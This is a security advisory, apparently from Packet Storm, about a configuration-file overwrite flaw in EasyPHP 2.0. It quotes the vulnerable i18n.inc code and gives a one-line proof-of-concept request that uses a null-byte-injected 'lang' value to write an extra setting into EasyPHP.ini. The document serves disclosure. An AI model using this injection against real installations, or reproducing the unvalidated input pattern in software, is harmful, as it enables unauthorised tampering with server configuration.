EasyPHP version 2.0 suffers from a configuration file overwrite vulnerability.
87dca2c88938cadc33b0102c0be2ffb49d03761764f36f5b45c4694cc5caee32Bug : Arbitrary Modify Configuration File
Vendor : EasyPHP
Vendor URI : https://sourceforge.net/projects/quickeasyphp/
Product : EasyPHP 2.0
Author : Zigma [zigmatn @ gmail.com]
https://NullArea.NET
Description :
EasyPHP is a WAMP software bundle that installs web server services onto the Windows computer and allows quick-and-easy development of PHP and MySQL on a localhost (also known as 127.0.0.1).
The package includes an Apache server, a MySQL database, and the PHP extension.
[+] Analyis :
A slight look on i18n.inc
if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
{
$fp = fopen($filename, "r");
$ini_contents = fread($fp, filesize($filename));
fclose($fp);
$ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); <--
$fp = fopen($filename, "w");
fputs($fp,$ini_contents);
fclose($fp);
Header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
EasyPHP does not verify user Input ( Lang parameter ) wich leads to arbitrary overwrite EasyPHP configuration file (EasyPHP.ini) .
[+] Proof Of Concept :
The request :
https://localhost/index.php?lang=fr%00Lang=Overwritten
Results in overwriting EasyPHP.ini Adding the string "Lang=Overwritten".
f
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed